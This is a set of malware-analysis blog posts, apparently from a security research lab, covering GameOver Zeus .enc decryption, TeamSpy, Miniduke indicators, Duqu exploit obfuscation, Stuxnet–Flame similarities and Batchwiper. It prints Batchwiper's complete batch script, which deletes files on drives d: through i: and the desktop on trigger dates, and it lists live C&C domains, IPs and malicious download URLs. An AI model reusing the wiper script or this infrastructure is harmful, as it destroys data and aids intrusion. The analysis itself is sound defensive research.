Posted on Leave a comment

GameOver Zeus now uses Encryption to bypass Perimeter Security – .enc encryption

The criminals behind the malware delivery system for GameOver Zeus have a new trick. Encrypting their EXE file so that as it passes through your firewall, webfilters, network intrusion detection systems and any other defenses you may have in place, it is doing so as a non-executable “.ENC” file. If you are in charge of network security for your Enterprise, you may want to check your logs to see how many .ENC files have been downloaded recently.

Gary Warner wrote a blogpost over it, and shared some files and information with us. The question was, how the .enc file is decoded and used.

The droppers sent out through emails are pretty small, around 10-18 kb. These droppers have an obfuscation layer, so hard to directly analyze them. However, with volatility it was relatively easy with procexedump to extract a small, 5k downloader that actually connects to a server to download the related .enc file, decrypt and decompress it, and execute.

The encrypted files look like this at the beginning:

0000000000: 5A 5A 50 00 E7 31 0E 1E │ 02 17 0E 50 58 87 0E D1 ZZP ç1♫▲☻↨♫PX┼♫Ń
0000000010: 5C 87 3E AC A7 87 0E EB │ 58 BF 23 52 58 C7 0A 6B \┼>¬§┼♫ëXż#RXÇ◙k
0000000020: 41 87 E6 53 54 89 11 53 │ E2 89 0E E7 51 4A 2F EB A┼ćST%◄Sâ%♫çQJ/ë
0000000030: 58 86 42 9E 79 D3 66 3A │ 2B 87 2E 23 2A E8 69 21 X┼BžyÓf:+┼.#*či!
0000000040: 39 EA 0E 73 3B E6 60 3D │ 37 F3 2E 53 3A E2 2E 21 9ę♫s;ć`=7ó.S:â.!

ZZP\0 is a magic string, then a compressed and encrypted part is stored (here: 0xE7 0x31…)

After downloading the .enc file the dropper checks the magic:

.text:00971450 cmp byte ptr [esi], 5Ah
.text:00971453 jnz short loc_9714D2
.text:00971455 cmp byte ptr [esi+1], 5Ah
.text:00971459 jnz short loc_9714D2
.text:0097145B cmp byte ptr [esi+2], 50h
.text:0097145F jnz short loc_9714D2
.text:00971461 cmp [esi+3], bl
.text:00971464 jnz short loc_9714D2
.text:00971466 shl eax, 2
.text:00971469 push eax ; dwBytes
.text:0097146A push 8 ; dwFlags

… and does the decryption….
.text:0097149C loc_97149C: ; CODE XREF: start+455j
.text:0097149C xor [esi+ecx*4], eax
.text:0097149F mov edi, [ebp+78h+Buffer]
.text:009714A2 inc ecx
.text:009714A3 shr edi, 2
.text:009714A6 cmp ecx, edi
.text:009714A8 jb short loc_97149C

eax stores the encryption key, which is 32 bits long.
The executable stores its configuration in a compressed form, but in cleartext.

0000001000: 85 B0 00 64 63 6D 73 73 │ 65 72 76 00 69 63 65 73 •° dcmsserv ices
0000001010: 2E 63 6F 6D 02 00 0C 00 │ 2F 69 6D 61 67 65 80 73 .com☻ ♀ /image?s
0000001020: 2F 73 74 6F 72 69 01 1C │ 08 6C 69 64 00 18 70 64 /stori☺∟◘lid ↑pd
0000001030: 66 2E 18 65 6E 63 0D B4 │ 0F 00 B8 37 B8 0A 1E 01 f.↑enc♪´☼ ¸7¸◙▲☺
0000001040: 0E 02 00 06 65 6C 65 63 │ 00 74 72 69 63 69 61 6E ♫☻ ♠elec trician
0000001050: 73 00 64 75 62 6C 69 6E │ 69 72 20 65 6C 61 6E 64 s dublinir eland
0000001060: 04 78 2F 77 00 70 2D 63 │ 6F 6E 74 65 6E 00 74 2F ♦x/w p-conten t/
0000001070: 75 70 6C 6F 61 64 00 73 │ 2F 32 30 31 34 2F 30 16 upload s/2014/0▬
0000001080: 31 22 70 02 6B 01 03 6B │ 00 00 00 00 00 00 00 00 1"p☻k☺♥k

The compression here is RtlDecompressBuffer standard windows call.

rtldecompressbuffer_dword_972000 = (int (__stdcall *)(_DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD))GetProcAddress(v9, "RtlDecompressBuffer");

It is called like this:
rtldecompressbuffer_dword_972000(0x102u, v11, 1024, &unk_974000, 256, &v36);

0x102 stands for: 0x100 for max compression level, 0x02 for LZNT1 compression algorithm.

If you don’t have LZNT1 related code at hand, you might use the tool available at the following address: http://reboot.pro/files/file/121-lznt1-tools-bootmgrntfs/
It does not work for all the samples, but works most of the time.

So decompressed config looks like this:

0000000000: 64 63 6D 73 73 65 72 76 │ 69 63 65 73 2E 63 6F 6D dcmsservices.com
0000000010: 00 00 00 00 00 00 00 00 │ 00 00 00 00 00 00 00 00
0000000020: 2F 69 6D 61 67 65 73 2F │ 73 74 6F 72 69 65 73 2F /images/stories/
0000000030: 73 6C 69 64 65 73 2F 70 │ 64 66 2E 65 6E 63 00 00 slides/pdf.enc
0000000040: 00 00 00 00 00 00 00 00 │ 00 00 00 00 00 00 00 00
0000000050: 00 00 00 00 00 00 00 00 │ 00 00 00 00 00 00 00 00
0000000060: B8 37 B8 1E 00 00 00 00 │ 02 00 00 00 65 6C 65 63 ¸7¸▲ ☻ elec
0000000070: 74 72 69 63 69 61 6E 73 │ 64 75 62 6C 69 6E 69 72 triciansdublinir
0000000080: 65 6C 61 6E 64 2E 63 6F │ 6D 00 00 00 2F 77 70 2D eland.com /wp-
0000000090: 63 6F 6E 74 65 6E 74 2F │ 75 70 6C 6F 61 64 73 2F content/uploads/
00000000A0: 32 30 31 34 2F 30 31 2F │ 70 64 66 2E 65 6E 63 00 2014/01/pdf.enc
00000000B0: 00 00 00 00 00 00 00 00 │ 00 00 00 00 00 00 00 00
00000000C0: 00 00 00 00 00 00 00 00 │ 00 00 00 00 B8 37 B8 1E ¸7¸▲
00000000D0: 00 01 00 00 02 00 00 00 │ ☺ ☻

The 32-bits xor code used for encryption is stored 0x60 bytes after the beginning of this buffer, that means, for both servers it is 0b8 0x37 0xb8 0x1e.
This should be used cyclically on the .enc file to get the compressed file , which again is compressed with RTLCompressBuffer call.

So how to make a universal decoder for .enc files?

Let’s check this one:

0000000000: 5A 5A 50 00 5F 8D B8 53 │ E2 A7 B8 1D B8 37 B8 9C ZZP _Ť¸S⧸↔¸7¸ś
0000000010: BC 37 88 E1 47 37 B8 A6 │ B8 0F 95 1F B8 77 BC 26 Ľ7?áG7¸|¸☼•▼¸wĽ&
0000000020: A1 37 60 1E B4 39 A7 1E │ 02 39 B8 AA B1 FA 99 A6 ˇ7`▲´9§▲☻9¸Ş+út|
0000000030: B8 36 F4 D3 99 63 D0 77 │ CB 37 98 6E CA 58 DF 6C ¸6ôÓtcĐwË7?nĘXßl

I’m cheating and telling you that it will be decrypted to

0000000000: E7 BA 00 4D 5A 90 00 03 │ 00 00 00 82 04 00 30 FF çş MZ? ♥ '♦ 0˙
0000000010: FF 00 00 B8 00 38 2D 01 │ 00 40 04 38 19 00 D8 00 ˙ ¸ 8-☺ @♦8↓ Ř
0000000020: 0C 0E 1F 00 BA 0E 00 B4 │ 09 CD 21 B8 00 01 4C CD ♀♫▼ ş♫ ´○Í!¸ ☺LÍ

Where B8->00 53->4D E2->5A A7->90 is the transformation.
4D 5A is the standard PE header, and for all the .enc files, the next byte was 0x90. Before the MZ header, the compression magic always contains a 0x00 byte. So we have 4 fixed bytes. Hence let’s calculate the key:

1st byte: 0xB8 xor 0x00 = 0xb8
2nd byte: 0x53 xor 0x4D = 0x1E
3rd byte: 0xE2 xor 0x5A = 0xb8
4th byte: 0xA7 xor 0x90 = 0x37

Remember the config file? The key was B8 37 B8 1E, this is just a rotated version of it with 2 bytes shift as you know, the magic starts with two additional bytes.

So as these bytes are currerntly constants, it’s evident to create a generic decryptor too for the .enc files, that works without the hard coded key, only with the .enc files. After decrypting, of course, you have to run RTLDecompressBuffer to get the actual executable.
Note, there is another small encryption routine in the 5k dropper, we did not fully investigate what it codes:

.text:00971000 encrypt_sub_971000 proc near ; CODE XREF: start+4AFp
.text:00971000
.text:00971000 arg_0 = dword ptr 4
.text:00971000 arg_4 = byte ptr 8
.text:00971000 arg_8 = dword ptr 0Ch
.text:00971000
.text:00971000 mov ecx, [esp+arg_8]
.text:00971004 test ecx, ecx
.text:00971006 jz short loc_971029
.text:00971008 movzx eax, [esp+arg_4]
.text:0097100D imul eax, 1010101h
.text:00971013 mov edx, ecx
.text:00971015 push ebx
.text:00971016 push edi
.text:00971017 mov edi, [esp+8+arg_0]
.text:0097101B shr ecx, 2
.text:0097101E rep stosd
.text:00971020 mov ecx, edx
.text:00971022 and ecx, 3
.text:00971025 rep stosb
.text:00971027 pop edi
.text:00971028 pop ebx
.text:00971029
.text:00971029 loc_971029: ; CODE XREF: encrypt_sub_971000+6j
.text:00971029 mov eax, [esp+arg_0]
.text:0097102D retn
.text:0097102D encrypt_sub_971000 endp

(copied from cef76fa7b4b30f76c7b6d2eefa30d944 sample)

Posted on Leave a comment

TeamSpy – Obshie manevri. Ispolzovat' tolko s razreshenija S-a

The CrySyS Lab, Budapest has been notified by the Hungarian National Security Authority (www.nbf.hu) about the detection of an ongoing high profile targeted attack affecting our home country, Hungary. During our investigation of the incident, we discovered a number of C&C servers, and a large number of malware samples that have been used in multiple attacks campaigns in the last couple of years. Indeed, the collected evidences suggest that part of the attack toolkit we discovered was used back in 2010. It seems that the main objective of the attackers was information gathering from the infected computers. Many of the victims appear to be ordinary users, but some of the victims are high profile industrial, research, or diplomatic targets, including the case that triggered our investigation. As part of the attackers’ activities is based on misusing the TeamViewer remote access tool, we named the entire malicious toolkit TeamSpy.

We detail the findings in our technical report.

As mentioned above, a distinct feature of the attack is the abuse of the legitimate TeamViewer remote access tool. The attackers install an original, legitimate TeamViewer instance on the victim computer, but they modify its behavior with DLL hijacking, and they obtain remote access to the victim computers in real-time. Therefore, the attackers are not only able to remotely observe the infected computers, but they can also misuse TeamViewer to install other tools to obtain important information, files, and other data from the victim.
The collected evidences suggest that attacks have been carried out in multiple campaigns. In addition to the TeamViewer based campaigns, we also saw signs indicating a number of older attacks based on proprietary malware with C&C server based control. We estimate the number of distinct campaigns to be in the order of tens.

The activities of the attackers might be related to other known attack campaigns, like the TeamBot/Sheldor campaign (banking cyber-crime), as we describe later in this document. Despite of this relation to cyber-crime activities, we believe TeamSpy has been used in high-profile targeted attacks too. This is underpinned by the following observations:

• In case of the Hungarian incident, the signs clearly show that the target is high-profile.
• Some malware samples were created just for the retrieval of specific office documents (see the analysis of module 2016_11.txt below) whose name (e.g. “gaza tunnel”) indicate that the target is probably high-profile.
• The telemetry revealed additional high-profile victims outside Hungary. Indeed, multiple victims were found in Iran, including victims at http://www.sashiraz.co.ir, which is an electronics company with government background. The possible date of infection for this victim is from 2010.
• Some tools used by the attackers run traceroute to an unknown host on a subnet, where some other hosts belong to the Ministry of Foreign Affairs of Uzbeghistan.
• Some tools used in the attacks look for files matching the following templates saidumlo secret.* секрет.* парол.* .xls *.pdf *.pgp *pass.* *.rtf *.doc. This list shows the interest of the attackers in “secret” and “password” documents. In addition, the attackers’ interest in .pgp and .p12 files indicates that they were looking not only for passwords, but also for cryptographic keys, which goes beyond attacks against ordinary users.

During our investigation, we uncovered a large set of malware samples that were probably utilized back in the past; hence, our analysis can also shed light on older malware campaigns and might help victims to reveal incidents that are several years old. Therefore, the information disclosed in this report could be used to perform a longitudinal study of targeted malware attacks.
While identity of most of the victims could not be revealed, we have information on some high-profile victims, e.g.:

  • 11/2012: Hungarian high profile governmental victim.
  • 03/2013: Embassy of NATO/EU state in Russia
  • 04/2010: Electronics company in Middle-East, Govt. background
  • 03/2013: Multiple research/educational organizations in France and Belgium
  • 03/2013: Industrial manufacturer in Russia

Please read the detailed technical report.

Posted on Leave a comment

New miniduke samples hashes

6a2c682163f7bd572e5b32861f339749a5e6338f *bg_efa.gif
5f9d29ff787ee57cf1efc50ba912b8170d877c8c *bg_efa.gif_dec
7594baa64a94147fe4a480bb1f05421499bafbfa *bg_efd.gif
a26b92e612d3a282a294b9fed313998270fb3de8 *bg_efd.gif_dec
3bcd6d97a08406b09c8a1754fc2813b8c31305ec *bg_efssa.gif
3fc74035fefe01a0f88266e1ea6982568db37969 *bg_efssa.gif_dec
a725f94d95ff667657186295c47d4dc487ec3dec *bg_ght.gif
ffabcf3e947aaeefb52ec4385ceb339bc3bbc4a9 *bg_ght.gif_dec
065624d59c2bf607df10bfec1fb104fee09f9dd6 *bg_ldf.gif
5deb581700d373b5890e3bd684306473d34d02cc *bg_ldf.gif_dec
43ef986db9a1c9ff7fd0d84d8495a4f3d9e82543 *bg_lef.gif
131b72a8d950bcf3de273f8a6aac56f8884b5e1e *bg_lef.gif_dec
03ed5e370513eb4d357fbc391ce57c75d179551e *bg_ler.gif
726924e450ffb50c6cd600dca35e8353e0d42c8b *bg_ler.gif_dec
6799b0d8e9ec469fa455b01ffde63b8c *bg_efa.gif
ac1c9fd4c6ba5ef3673a871960a48622 *bg_efa.gif_dec
665eb69b1a917b5c8e3588efcc258539 *bg_efd.gif
a401042e3276bcb4d4012da392e6374a *bg_efd.gif_dec
9253eae9b443f67b12a2b399f54bb2cb *bg_efssa.gif
f3de8feb3ea4f367053755123389c1ae *bg_efssa.gif_dec
9fee2fcc92b74e0fb65dc42214ae9952 *bg_ght.gif
41d4eb3aab5acd87657c4b9ea9432d9b *bg_ght.gif_dec
37307978b24a9185ec8b4ca14afefd99 *bg_ldf.gif
e92584a5624b2fa044a671198c834221 *bg_ldf.gif_dec
9c2433c9768c43a8f4ae0fc72b1cc1cc *bg_lef.gif
0f76f6e9d7659d4fb087d18bec1bd48f *bg_lef.gif_dec
535011c4887a098fc67adb5eebc64525 *bg_ler.gif
3b83c9bb67ce8166c0312b1abe9cd5a7 *bg_ler.gif_dec

Posted on Leave a comment

Miniduke

Earlier in February 2013, FireEye announced the discovery of a new malware that exploited a 0-day vulnerability in Adobe Reader. Now, we announce another, as yet unknown malware that exploits the same Adobe Reader vulnerability (CVE-2013-0640).

This new malware was named Miniduke by Kaspersky Labs with whom we carried out its first analysis. Our participation in this research was justified by a detected Hungarian incident. A detailed report on the results of our joint efforts has been published by Kaspersky Labs on their Securelist blog site. That report describes what we currently know about the operation of Miniduke including its stages, and also information on the C&C infrastructure and communications. We have published another report from CrySys Lab that contains information on the indicators of Miniduke infections and gives specific hints on its detection. This blog entry is a brief excerpt of our report.

The available malware samples are highly obfuscated, and compiled by a polymorphic compiler. The attackers were able to produce new variants with only a few minutes difference between compile times. Therefore, the number of distinct samples could be very large. Hashes of known samples are published in our detailed report on indicators.

Due to a large number of compiled samples, there is a high chance that the current version is difficult to detect by signatures. Yet, there are common features in the samples that can be used to identify the malware components.

In every case we encountered, the “Program Files/Startup” contains a file with .lnk extension after installation. This is used to start up the malware after the computer is rebooted.

A not fully cross-checked information is that, during installation, the malware will be copied in two copies on the system and the two executables differ. This might mean that the executable modifies itself. For example, we recovered the following two files:

md5sum base.cat :113e6fc85317fdd135e3f5f19e6c7a58 *base.cat
md5sum ~6rld.tmp : c786a4cdfe08dbe7c64972a14669c4d1 *~6rld.tmp

where base.cat is the startup file, which is created based on ~6lrd.tmp. base.cat is stored in the “All users” directory, whereas ~6lrd.tmp is stored in a user’s directory, e.g., in the guest user directory as “C:\Documents and Settings\guest\Local Settings\Application Data\~6rld.tmp”. This user directory contains at least one more file, update.cmd, with a specific content that could be used for detection.

As for stage 3 of the attack, it is important to note that it is not yet analyized deeply. So once a victim downloads the ~300k long piece of stage 3 code, we don’t know what happens with the previous stages, and we have no information about detections once this stage is reached, except the usage of the C&C server news.grouptumbler.com. Another variant of the stage 3 code is much smaller, only 14k long, and connects to a server in Turkey.

We have identified the following servers delivering stage 2 and stage 3 code to victims:

arabooks.ch 194.38.160.153 / Switzerland
artas.org 95.128.72.24 / France
tsoftonline.com 72.34.47.186 / United States
www.eamtm.com 188.40.99.143 / Germany

The C&C server used by stage 3 of the malware is news.grouptumbler.com (IP 200.63.46.23) and it is located in Panama.

There are multiple layers of C&C communications in the malware. First, the malware uses Google search to receive information from its master. Then, it uses the Twitter messaging service looking for the twits of a specific Twitter user. Commands received via this channel trigger the download of stage 2 and stage 3 code.

Basic detection can be based on the queries that are initiated by the victim computer within seconds:

www.google.com – port TCP/80 - HTTP
twitter.com –port TCP/443 - SSL
www.geoiptool.com –port TCP/80 - HTTP

Known search strings in Google search can also be used to detect the malware:

lUFEfiHKljfLKWPR
HkyeiIDKiroLaKYr
lUFEfiHKDroLaKYr

Unfortunately, these strings are most likely unique to each C&C server or victim, thus unknown samples might use other strings, but possibly with the same length.

Examples for twits containing the URL of the C&C server are shown below:

The weather is good today. Sunny! uri!wp07VkkxYt3Mne5uiDkz4Il/Iw48Ge/EWg==
Albert, my cousin. He is working hard. uri!wp07VkkxYmfNkwN2nBmx4ch/Iu2c+GJow39HbphL
My native town was ruined by tornado. uri!wp07VkkxYt3Md/JOnLhzRL2FJjY8l2It

The malware also sends a query to the geoiptool. An example is shown below:

GET / HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 6.0; en-US; Trident/5.0)
Host: www.geoiptool.com

The malware retrieves the URL of the stage 2/3 delivery C&C server from Twitter messages as described above. Then, we can observe the first query from the victim towards the server. This query contains pure HTTP traffic on port 80 to the server following the template below.

GET /original/path/shortname/index.php?e=aaaaaaaaa

where:

  • shortname can be a number of strings, generally human readable (e.g. lib, engine, forum, forumengine etc.)
  • “e=” is not constant, can be anything, but generally 1-2 letters long
  • aaaaaaaaa stands for some Base64-like text (see details below)
  • the servers used are assumed to be legitimate sites, just hacked by the attackers.

Based on this format, we can detect a valid query as follows:

The name of the first GET parameter should be discarded

  • this means “e=” is not important
  • we saw only one GET parameter, queries with multiple parameters are likely not used

For detection, the Base64-like string “aaa…” should be first modified as follows:

  • “-” should be replaced by “+”
  • “_” should be replaced by “/”

This results in correct Base64 encoding, which can be decoded with library functions such as base64_decode. After decoding, a string of data, partially binary, will be available. Parts are separated by the delimiter character “|”. The format and a numerical example are below:

binary data ( ~100 bytes)|numerical ID ( ~10 digits)|version number

e.g.,

binary data|5551115551|1.13

As the binary data itself may contain the ”|” character, parsing should start from the end (i.e., the numerical ID starts from the second “|” character from the end). In additional, the ID length may vary (not fully confirmed), but it seems to be around 10 digits. Finally, the version number always follows the pattern “one digit.two digits”, e.g., 1.1X 3.1X.

gif-image

The C&C server’s response – if it sends encrypted files – is a GIF file containing a small icon, and after that, the malware. For stage 3, the file downloaded has a larger size (~300KB). It also begins with a GIF header, but that header is only 13 bytes long, and then starts the encrypted executable (see picture above).

Posted on Leave a comment

Encryption related to Duqu font expoit (CVE-2011-3402)

You remember the Duqu font related exploit and shell code in the dropper? Yes, that’s the exploit that was recently used in many exploit kits.
First of all, this is a kernel level exploit, it should be kept in mind while checking code.

The original dropper had a decryptor for the stage1 of shell code:

void __fastcall sub_1500(int a1, int a2)
{
int v2; // eax@2
int v3; // ecx@2
int v4; // eax@5
int i; // eax@5

if ( !dword_14FC )
{
v2 = 0;
dword_14FC = 1;
v3 = (unsigned __int8)dword_14F8;
while ( v2 != dword_14F8 )
{
LOBYTE(a2) = v2 ^ *((_BYTE *)sub_17C + v2) ^ v3;
*((_BYTE *)sub_17C + v2) = a2;
a2 = (unsigned __int8)a2;
++v2;
v3 ^= a2;
}
v4 = sub_158C(v2, a2, v3);
sub_17C(v4 - (_DWORD)sub_17C);
for ( i = 0; i != dword_14F8; ++i )
*((_BYTE *)sub_17C + i) = 0;
}
}

It’s not a complicated obfustation/crypto, the interesting thing is that it is not like the ones for Flame. The most similar thing is Stuxnet’s modules’s crypto, maybe later discussed.

The next level is still obfuscated. ntoskrnl.exe function calls are stored in a table by hash of the function call name, just like calls are obfuscated in other parts of Duqu. This is not unusal, but shows specific care on the module.

The hash-function relation table is costructed like under:

seg000:00001043 mov [esi+10h], eax
seg000:00001046 jz loc_11B2
seg000:0000104C push ecx
seg000:0000104D push ecx
seg000:0000104E push 0BF5CA508h ; ExAllocatePool, hash:bf5ca508
seg000:00001053 push edi
seg000:00001054 call sub_7FD
seg000:00001059 add esp, 10h
seg000:0000105C test eax, eax
seg000:0000105E mov [esi+14h], eax
seg000:00001061 jz loc_11B2
seg000:00001067 push edx
seg000:00001068 push edx
seg000:00001069 push 2973E9CCh ; export name: ExFreePool, hash:2973e9cc
seg000:0000106E push edi
seg000:0000106F call sub_7FD
seg000:00001074 add esp, 10h
seg000:00001077 test eax, eax
seg000:00001079 mov [esi+18h], eax

Note the constants 2973ECCh and similar. These are identifiers of ntoskrnl.exe exports (specific functions).

The hash calculation is done like this:
for ( i = 0; ; i += 7 * i * i + 12 * v8 + 17 * v8 * v8 )
{
v8 = (_BYTE *)v3;
if ( !
(_BYTE *)v3 )
break;
++v3;
}

It’s not like encryption/obfuscation code for FLame. Maybe the exploit creators also provided this stage to the customers.

Based on this code function calls in the exploit can be recovered. And still, this is just one step among others to fully understand how original Duqu dropper worked…

A few sample values for hashes based on the function described above:


export name: AlpcInitializeMessageAttribute, hash:f8ab4ead
export name: CcCanIWrite, hash:c833f901
export name: CcCoherencyFlushAndPurgeCache, hash:41ab559d
export name: CcCopyRead, hash:99b1f488
export name: CcCopyWrite, hash:96bc06d5
export name: CcCopyWriteWontFlush, hash:210fdfb4
export name: CcDeferWrite, hash:038897a1
export name: CcFastCopyRead, hash:1e3c8f5c
export name: CcFastCopyWrite, hash:c1874039
export name: CcFastMdlReadWait, hash:2eea7438
export name: CcFlushCache, hash:0a30abdd
export name: CcGetDirtyPages, hash:cc24ab45
export name: CcGetFileObjectFromBcb, hash:8244f064
export name: CcGetFileObjectFromSectionPtrs, hash:9406fe99

… possibly TBC…

Posted on Leave a comment

Stuxnet-Flame relation

Some time ago, we rechecked some Stuxnet code. Guess what have we learned: Kasperksy already published Flame-Stuxnet relationship, but on the encryption level, there is another similarity. In fact, this was found by Norman back in June , but they compared with soapr32’s encryption which is slightly more different than 4069.dll’s encryption E2.

Stuxnet PLC dll encryption code:
unsigned int __cdecl encryption_routine_sub_10010B26(int a1)
{
int v1; // eax@1

v1 = (a1 + 11) * (a1 + 17);
return (a1 + 11) * (a1 + 17) ^ (((a1 + 11) * (a1 + 17) & 0xFFFFFF00 ^
((((unsigned int)((a1 + 11) * (a1 + 17)) >> 8) ^ v1
& 0xFF0000) >> 8)) >> 8);
}

Flame 4069.dll:
unsigned int __cdecl encryptor_sub_4025C0(int a1)
{
return (a1 + 11) * (a1 + 17) ^ (((unsigned __int16)((a1 + 11) * (a1 + 17) & 0xFF00)
^ ((((unsigned int)((a1 + 11) * (a1 + 17)) >> 8) ^ (a1 + 11) * (a1 + 17) &
0xFF0000) >> 8)) >> 8);

But for what reason was this encryption (obfuscation) used in 4069?

Flame 4069 contains some strings like this:

5F 5F 73 73 5F 73 5F 5F 00 31 32 25 77 69 6E 64 ss_s.12%wind
69 72 25 5C 73 79 73 74 65 6D 33 32 5C 72 64 63 ir%\system32\rdc
76 6C 74 33 32 2E 65 78 65 00 5F 5F 73 73 5F 65 vlt32.exe.__ss_e

Basically ss_s is some kind of magic string where “ss” stands for string. then “00” is a placeholder for a length variable,
“12” is a magic string, and finally the encrypted string is put in the file. Oh, no. Wait a minute. This seems to be human readable?! Yes, basically 4069 is prepared to accept encrypted strings “if needed”, but the marker for doing that is the length field. If it is 00 (as above), then the string is unencrypted, and can be direcrtly read, otherwise it uses E2 to decrypt the string. Magic “12” is not part of the “real” string, this info is a fix for our Flame/Skywiper tech report.
All-in-all, the connection is not jut strange, but in 4069 this encryption routine is not even really used. Most likely, authors have made a postprocessor for the binary finding s_s strings, 12 magics and then encrypting strings and writing back length field into the file, but for some reason in the samples we saw, they did not use the post-processing tool.


.text:004025F1 mov ebx, [esp+4+length_arg_4]
.text:004025F5 push esi
.text:004025F6 xor esi, esi
.text:004025F8 test ebx, ebx
.text:004025FA jbe short loc_402618

If length is not set, then jump out of the decryption loop.

Posted on Leave a comment

How Duqu resource 302 finds the .zdata section

Just a short blog entry to save this info for the history.

We investigated originally two different pieces of duqu payload. One contained resource 302 with a compressed .zdata section, the other contained the to-be-injected code without compression. The injector-loader is the same for the two versions, then how does it find if .zdata should be loaded?

Here is the trick from netp 301 resource:

.text:10001220 mov ecx, 5A4Dh
.text:10001225 cmp [eax], cx
.text:10001228 jnz loc_100012CD
.text:1000122E mov ecx, [eax+3Ch]
.text:10001231 add ecx, eax
.text:10001233 cmp dword ptr [ecx], 4550h
.text:10001239 jnz loc_100012CD

First it checks for “MZ” header, then it check “PE” signature.
Now,

.text:1000123F movzx edx, word ptr [ecx+6] ; number of sections in PE File (5)
.text:10001243 cmp dx, 3
.text:10001247 jbe loc_100012CD
.text:1000124D movzx esi, word ptr [ecx+14h] ; pointer to symbol table
.text:10001251 movzx edx, dx
.text:10001254 imul edx, 28h ; each section entry in section table- 40 byte
.text:10001257 add edx, ecx
.text:10001259 lea edi, [esi+edx-38h] ; the section before the last section (zdata) + offset
.text:1000125D test edi, edi
.text:1000125F jz short loc_100012CD
.text:10001261 cmp dword ptr [edi+1Ch], 0BC395587h ; zdata magic PE Header NumberOfRelocations is abused
.text:10001268 jnz short loc_100012CD
.text:1000126A cmp dword ptr [edi+8], 2Ch ; some check on physical size
.text:1000126E jb short loc_100012CD

As you can see, it calculates the exact place for the end of the section table then moves back to the entry before the last (this is .zdata info). Then it checks for a magic number 0xBC395587 which is stored in “NumberOfReloctions” value.

.text:10001270 mov esi, [edi+0Ch]
.text:10001273 add esi, eax
.text:10001275 cmp dword ptr [esi], 0D139120Eh
.text:1000127B jnz short loc_100012CD

Finally it checks the first 4 bytes of the .zdata section against 0xD139120e.

Posted on Leave a comment

#Batchwiper – Batchwiper malware (target:Iran)

Iranian CERT Maher just posted http://www.certcc.ir/index.php?name=news&file=article&sid=2293


Latest investigation have been done by Maher center in cyber space identified a new targeted data wiping malware. Primitive analysis revealed that this malware wipes files on different drives in various predefined times. Despite its simplicity in design, the malware is efficient and can wipe disk partitions and user profile directories without being recognized by anti-virus software. However, it is not considered to be widely distributed. This targeted attack is simple in design and it is not any similarity to the other sophisticated targeted attacks. The identified components of this threat are listed in the following table”…

As it happens quite some time, the malware itself seems not to be much of interest, but the possible targets and the way they probably used it makes it more into attention. So don’t judge too early about the lameness of such tool, it can still pinpoint an important action.

The main file, GrooveMonitor.exe is a self-extracting file, it contains a rar file at position 103936. The rar contains juboot, jucheck and sleep.

MD5
GrooveMonitor.exe [dropper] f3dd76477e16e26571f8c64a7fd4a9
juboot.exe fa0b300e671f73b3b0f7f415ccbe9d41
jucheck.exe c4cd216112cbc5b8c046934843c579f6
SLEEP.EXE ea7ed6b50a9f7b31caeea372a327bd37
WmiPrv.exe b7117b5d8281acd56648c9d08fadf630

Sleep.exe is basically a public tool available for batch programmers:
ftp://ftp.sac.sk/pub/sac/utiltask/sleep_47.zip

juboot is a UPX 3.03 compressed archive of a probably bat2exe converted file (not checked what exactly) (very low on budget to write batch malware?), that contains these:

"
@echo off & setlocal
sleep for 2
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v jucheck.exe /t REG_SZ /d "%systemroot%\system32\jucheck.exe" /f

start "" /D"%systemroot%\system32\" "jucheck.exe"
"

PADjuboot.batPA…

jucheck contains
"
@echo off & setlocal

sleep for 2
del "%systemroot%\system32\juboot.exe" /q /s /f
del "%userprofile%\Start Menu\Programs\Startup\GrooveMonitor.exe" /q /s /f

if "%date%"=="Mon 12/10/2012" goto yes
if "%date%"=="Tue 12/11/2012" goto yes
if "%date%"=="Wed 12/12/2012" goto yes

if "%date%"=="Mon 01/21/2013" goto yes
if "%date%"=="Tue 01/22/2013" goto yes
if "%date%"=="Wed 01/23/2013" goto yes

if "%date%"=="Mon 05/06/2013" goto yes
if "%date%"=="Tue 05/07/2013" goto yes
if "%date%"=="Wed 05/08/2013" goto yes

if "%date%"=="Mon 07/22/2013" goto yes
if "%date%"=="Tue 07/23/2013" goto yes
if "%date%"=="Wed 07/24/2013" goto yes

if "%date%"=="Mon 11/11/2013" goto yes
if "%date%"=="Tue 11/12/2013" goto yes
if "%date%"=="Wed 11/13/2013" goto yes

if "%date%"=="Mon 02/03/2014" goto yes
if "%date%"=="Tue 02/04/2014" goto yes
if "%date%"=="Wed 02/05/2014" goto yes

if "%date%"=="Mon 05/05/2014" goto yes
if "%date%"=="Tue 05/06/2014" goto yes
if "%date%"=="Wed 05/07/2014" goto yes

if "%date%"=="Mon 08/11/2014" goto yes
if "%date%"=="Tue 08/12/2014" goto yes
if "%date%"=="Wed 08/13/2014" goto yes

if "%date%"=="Mon 02/02/2015" goto yes
if "%date%"=="Tue 02/03/2015" goto yes
if "%date%"=="Wed 02/04/2015" goto yes
goto no

:yes

sleep for 3000
IF EXIST d:\ del "d:*." /q /s /f
IF EXIST d:\ Chkdsk d:
IF EXIST e:\ del "e:*.
" /q /s /f
IF EXIST e:\ Chkdsk e:
IF EXIST f:\ del "f:*." /q /s /f
IF EXIST f:\ Chkdsk f:
IF EXIST g:\ del "g:*.
" /q /s /f
IF EXIST g:\ Chkdsk g:
IF EXIST h:\ del "h:*." /q /s /f
IF EXIST h:\ Chkdsk h:
IF EXIST i:\ del "i:*.
" /q /s /f
IF EXIST i:\ Chkdsk i:

del "%userprofile%\Desktop*.*" /q /s /f
\start calc

:no
PAjucheck.batP☺
"

Still the questions are
a.) What is the dropper
b.) Is it surely an important attack, no matter how amateur the tools are?

Posted on Leave a comment

SPE/MiniFlame

SPE/MiniFlame contains the same “main” encryption alg from ver 4.00-5.00

It looks like this:
.text:10007DDE Decrypt_str_10007DDE proc near ; CODE XREF: sub_10001223+5p
.text:10007DDE ; sub_10001223+16p ...
.text:10007DDE
.text:10007DDE arg_0 = dword ptr 4
.text:10007DDE
.text:10007DDE mov ecx, [esp+arg_0]
.text:10007DE2 push esi
.text:10007DE3 cmp byte ptr [ecx+0Ch], 42h
.text:10007DE7 lea esi, [ecx+0Dh]
.text:10007DEA jnz short loc_10007DF0
.text:10007DEC mov eax, esi
.text:10007DEE pop esi
.text:10007DEF retn
.text:10007DF0 ; ---------------------------------------------------------------------------
.text:10007DF0
.text:10007DF0 loc_10007DF0: ; CODE XREF: Decrypt_str_10007DDE+Cj
